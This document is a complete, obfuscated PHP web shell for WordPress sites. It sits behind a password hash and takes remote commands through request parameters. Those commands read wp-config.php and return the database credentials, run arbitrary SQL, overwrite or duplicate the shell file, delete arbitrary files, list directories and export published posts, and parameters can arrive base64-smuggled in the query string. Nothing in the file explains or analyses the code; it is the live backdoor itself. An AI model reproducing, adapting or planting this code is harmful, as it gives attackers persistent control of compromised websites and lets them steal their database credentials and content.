fLKwx2ilPO
<?php
define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '47185d8410ea2da768273893204a7cd5'); define('VERSION', '0.2.3'); function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } } function r_get_config_path() { $sp7f108d = realpath('.'); $sp3733b4 = 0; while ($sp7f108d != '/') { if (file_exists(sprintf('%s/wp-config.php', $sp7f108d)) && file_exists(sprintf('%s/index.php', $sp7f108d)) && file_exists(sprintf('%s/wp-settings.php', $sp7f108d))) { return $sp7f108d; } $sp3733b4++; $sp7f108d = realpath(str_repeat('../', $sp3733b4)); } } function r_get_config() { $sp7f108d = realpath('.'); $sp3733b4 = 0; while ($sp7f108d != '/') { file_put_contents('flog.log', $sp7f108d . '
', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $sp7f108d)) && file_exists(sprintf('%s/index.php', $sp7f108d)) && file_exists(sprintf('%s/wp-settings.php', $sp7f108d))) { $spfc7840 = file(sprintf('%s/wp-config.php', $sp7f108d)); $spfc7840 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $spfc7840), PREG_GREP_INVERT); $spfc7840 = implode('
', $spfc7840); eval($spfc7840); $sp7ad20a = 'table_prefix'; $sp1cc7f2 = explode(':', DB_HOST); $sp700fdf = array_shift($sp1cc7f2); $spc66a49 = array_shift($sp1cc7f2); $spc66a49 = $spc66a49 ? $spc66a49 : 3306; return array('host' => $sp700fdf, 'port' => $spc66a49, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$sp7ad20a}, 'path' => $sp7f108d); break; } $sp3733b4++; $sp7f108d = realpath(str_repeat('../', $sp3733b4)); } } function r_mysql_connect($spfc7840) { $sp87507e = mysql_connect(sprintf('%s:%s', $spfc7840['host'], $spfc7840['port']), $spfc7840['user'], $spfc7840['pass']); mysql_select_db($spfc7840['db'], $sp87507e); return $sp87507e; } function r_mysqli_connect($spfc7840) { return new mysqli($spfc7840['host'], $spfc7840['user'], $spfc7840['pass'], $spfc7840['db'], is_numeric($spfc7840['port']) ? $spfc7840['port'] : 3306, !is_numeric($spfc7840['port']) ? $spfc7840['port'] : null); } function r_mysql_query($spfc7840, $sp87507e, $sp836517, $sp89f25f = array()) { if (!empty($sp89f25f)) { foreach ($sp89f25f as $spf80496 => $spb02888) { $sp836517 = str_replace($spf80496, mysql_real_escape_string($spb02888, $sp87507e), $sp836517); } } $sp785ad5 = array(); $sp2f1e58 = mysql_query($sp836517, $sp87507e); if ($sp2f1e58) { while ($spedd3a1 = mysql_fetch_assoc($sp2f1e58)) { $sp785ad5[] = $spedd3a1; } return array('success' => $sp785ad5); } else { return array('error' => sprintf('%s :: %s', mysql_errno($sp87507e), mysql_error($sp87507e))); } } function r_mysqli_query($spfc7840, $sp87507e, $sp836517, $sp89f25f = array()) { if (!empty($sp89f25f)) { foreach ($sp89f25f as $spf80496 => $spb02888) { $sp836517 = str_replace($spf80496, $sp87507e->real_escape_string($spb02888), $sp836517); } } $sp2f1e58 = $sp87507e->query($sp836517); if (is_object($sp2f1e58)) { $sp785ad5 = array(); while ($spedd3a1 = $sp2f1e58->fetch_assoc()) { $sp785ad5[] = $spedd3a1; } return array('success' => $sp785ad5); } if ($sp2f1e58) { return array('success' => true); } else { return array('error' => sprintf('%s :: %s', $sp87507e->errno, $sp87507e->error)); } } function r_mysql_query_res($spfc7840, $sp87507e, $sp836517, $sp89f25f = array()) { if (!empty($sp89f25f)) { foreach ($sp89f25f as $spf80496 => $spb02888) { $sp836517 = str_replace($spf80496, mysql_real_escape_string($spb02888, $sp87507e), $sp836517); } } $sp785ad5 = array(); $sp2f1e58 = mysql_query($sp836517, $sp87507e); return $sp2f1e58; } function r_mysql_query_row($sp2f1e58) { if ($sp2f1e58) { return mysql_fetch_assoc($sp2f1e58); } else { return false; } } function r_mysqli_query_res($spfc7840, $sp87507e, $sp836517, $sp89f25f = array()) { if (!empty($sp89f25f)) { foreach ($sp89f25f as $spf80496 => $spb02888) { $sp836517 = str_replace($spf80496, $sp87507e->real_escape_string($spb02888), $sp836517); } } $sp2f1e58 = $sp87507e->query($sp836517); return $sp2f1e58; } function r_mysqli_query_row($sp2f1e58) { if (is_object($sp2f1e58)) { return $sp2f1e58->fetch_assoc(); } else { return false; } } function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $spf80496 => $spb02888) { $_POST[$spf80496] = stripslashes($spb02888); } } } function r_action_prefix() { $spfc7840 = r_get_config(); echo $spfc7840['prefix']; } function r_action_query() { r_unmagic(); $spfc7840 = r_get_config(); $sp4f50ea = r_get_lib(); $sp89f25f = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $spbfc278 = array_map('trim', explode(',', $_POST['decode'])); foreach ($spbfc278 as $spb4566f) { if (isset($sp89f25f[$spb4566f])) { $sp89f25f[$spb4566f] = base64_decode($sp89f25f[$spb4566f]); } } } $sp87507e = call_user_func(sprintf('r_%s_connect', $sp4f50ea), $spfc7840); $sp2f1e58 = call_user_func(sprintf('r_%s_query', $sp4f50ea), $spfc7840, $sp87507e, $_POST['query'], $sp89f25f); if (isset($_POST['encode'])) { $sp5306ff = array_map('trim', explode(',', $_POST['encode'])); foreach ($sp2f1e58['success'] as $spc724a2 => $spedd3a1) { foreach ($sp5306ff as $sp47eea4) { $sp2f1e58['success'][$spc724a2][$sp47eea4] = base64_encode($sp2f1e58['success'][$spc724a2][$sp47eea4]); } } } echo json_encode($sp2f1e58); } function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); } function r_action_version() { echo VERSION; } function r_action_duplicate() { $sp9b2120 = copy(__FILE__, $_POST['dst']); echo (int) $sp9b2120; } function r_action_copy() { $sp9b2120 = copy($_POST['src'], $_POST['dst']); echo (int) $sp9b2120; } function r_action_dir() { $sp9b2120 = array(); $spb4566f = dir($_POST['dir']); while (false !== ($sp6bfd52 = $spb4566f->read())) { $spf3794e = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $sp6bfd52); $sp9b2120[] = array('type' => is_file($spf3794e) ? 'file' : (is_dir($spf3794e) ? 'dir' : 'unknown'), 'entry' => $sp6bfd52, 'full_entry' => $spf3794e, 'realpath' => realpath($spf3794e)); } $spb4566f->close(); echo json_encode($sp9b2120); } function r_action_wpversion() { $sp7f108d = r_get_config_path(); $spa1f8c3 = file_get_contents(sprintf('%s/wp-settings.php', $sp7f108d)); preg_match_all('/define\\(([^\\)]+)/i', $spa1f8c3, $sp73a715); foreach ($sp73a715[1] as $spc6906a) { if (strpos($spc6906a, 'WPINC') !== false) { $spc6906a = array_map('trim', explode(',', $spc6906a)); foreach ($spc6906a as $sp4b097a => $sp95cffd) { if ($sp95cffd[0] == $sp95cffd[strlen($sp95cffd) - 1]) { $spc6906a[$sp4b097a] = substr($sp95cffd, 1, strlen($sp95cffd) - 2); } } require_once $sp198fda = sprintf('%s%s%s%sversion.php', $sp7f108d, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $spc6906a[1]), DIRECTORY_SEPARATOR); $spc9797c = 'wp_version'; echo ${$spc9797c}; die; } } echo 'error'; } function r_action_w3tc() { $sp7f108d = r_get_config_path(); $sp2a2943 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp3c46cc = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } $sp3c46cc = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } echo 'success'; } function r_action_cenabler() { $sp7f108d = r_get_config_path(); $sp2a2943 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp3c46cc = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } $sp3c46cc = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } $sp3c46cc = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } $sp3c46cc = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp7f108d, $sp2a2943); if (file_exists($sp3c46cc)) { unlink($sp3c46cc); } echo 'success'; } function r_action_removeshell() { if (file_exists($spb9ae3e = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($spb9ae3e != __FILE__) { unlink($spb9ae3e); } echo file_exists($spb9ae3e) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_pages() { $sp744e58 = tempnam('./', 'wp') . '.php'; $sp557bfb = fopen($sp744e58, 'w'); $sp7f108d = r_get_config_path(); chdir($sp7f108d); $sp308417 = $_POST['id']; require $sp7f108d . '/wp-load.php'; r_unmagic(); $spfc7840 = r_get_config(); $sp4f50ea = r_get_lib(); $sp7ab90e = $spfc7840['prefix']; $sp87507e = call_user_func(sprintf('r_%s_connect', $sp4f50ea), $spfc7840); $sp2f1e58 = call_user_func(sprintf('r_%s_query_res', $sp4f50ea), $spfc7840, $sp87507e, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $sp7ab90e, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($spedd3a1 = call_user_func(sprintf('r_%s_query_row', $sp4f50ea), $sp2f1e58)) { fputcsv($sp557bfb, array($spedd3a1['ID'], base64_encode($spedd3a1['post_content']), base64_encode($spedd3a1['post_title']), base64_encode(get_permalink($spedd3a1['ID'])))); } fclose($sp557bfb); echo $sp744e58; } function r_action_config() { echo json_encode(r_get_config()); } function r_action_getlib() { echo r_get_lib(); } function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; } function r_action_loginurl() { $sp335fdc = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $sp3fc541 = $sp335fdc; $sp437352 = basename(__FILE__); $sp744e58 = basename(tempnam('./', 'ert') . '.php'); $sp0af35d = preg_replace(sprintf('/%s$/i', preg_quote($sp437352)), $sp744e58, $sp3fc541); echo file_get_contents($sp0af35d); } if (count($_GET) == 1 && !trim($sp79c84c = array_pop(array_values($_GET)))) { $sp2f1e58 = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $sp2f1e58); $_GET = $sp2f1e58; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $sp7f108d = r_get_config_path(); chdir($sp7f108d); $sp308417 = $_POST['id']; require_once $sp7f108d . '/wp-load.php'; $spdb9e08 = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $spdb9e08); break; default: $spa71efa = sprintf('r_action_%s', $_POST['action']); call_user_func($spa71efa); break; } } else { die('ympf'); }